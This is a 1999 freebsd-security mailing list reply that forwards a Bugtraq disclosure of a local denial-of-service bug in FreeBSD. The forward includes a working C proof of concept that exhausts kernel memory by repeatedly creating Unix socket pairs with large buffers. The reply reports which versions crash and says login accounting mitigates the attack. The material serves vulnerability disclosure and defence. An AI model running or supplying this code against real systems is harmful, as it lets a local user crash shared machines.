From owner-freebsd-security Wed Sep 1 10:46:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from free-bsd.org (edslppp4.dnvr.uswest.net [216.160.128.4]) by hub.freebsd.org (Postfix) with ESMTP id AB91014C18 for ; Wed, 1 Sep 1999 10:46:40 -0700 (PDT) (envelope-from geniusj@free-bsd.org) Received: from localhost (geniusj@localhost) by free-bsd.org (8.9.3/8.9.3) with ESMTP id LAA18942; Wed, 1 Sep 1999 11:49:41 -0600 (MDT) (envelope-from geniusj@free-bsd.org) Date: Wed, 1 Sep 1999 11:49:41 -0600 (MDT) From: FreeBSD -- The Power to Serve To: Jeff Wheat Cc: freebsd-security@FreeBSD.ORG Subject: Re: FW: Local DoS in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org If you have public access users, you should have login accounting in the first place.. and yes, it does stop it :).. I verified this on a 3.2 box with my login accounting setup.. On Wed, 1 Sep 1999, Jeff Wheat wrote: > I have just verified that this code will indeed crash the following > systems: > > Intel: 2.2.2, 2.2.6, 2.2.7, 2.2.8, 3.0, 3.1 > > Alpha: 4.0-19990809-SNAP > > > Regards, > Jeff > > -----FW: ----- > > Date: Fri, 27 Aug 1999 00:43:47 -0400 > Sender: Bugtraq List > From: "L. Sassaman" > To: BUGTRAQ@SECURITYFOCUS.COM > Subject: Local DoS in FreeBSD > > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > This was first posted to the FreeBSD security list on the 9th of August, > subsequently discussed on freebsd-stable and freebsd-hackers... no one > seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x > machines consistantly. I have also been told that it affects NetBSD and > OpenBSD, though I haven't confirmed it. > > Someone with the know-how care to fix? > > > > L. Sassaman > > System Administrator | "Even the most primitive society has > Technology Consultant | an innate respect for the insane." > icq.. 10735603 | > pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke > > > - --- > > > #include > #include > #include > > #define BUFFERSIZE 204800 > > extern int > main(void) > { > int p[2], i; > char crap[BUFFERSIZE]; > > while (1) > { > if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) > break; > i = BUFFERSIZE; > setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); > setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); > fcntl(p[0], F_SETFL, O_NONBLOCK); > fcntl(p[1], F_SETFL, O_NONBLOCK); > write(p[0], crap, BUFFERSIZE); > write(p[1], crap, BUFFERSIZE); > } > > return(0); > } > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v0.9.10 (GNU/Linux) > Comment: OpenPGP Encrypted Email Preferred. > > iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91 > TkVIqNdQpRi8CK9vySilouE= > =7ufs > -----END PGP SIGNATURE----- > > --------------End of forwarded message------------------------- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message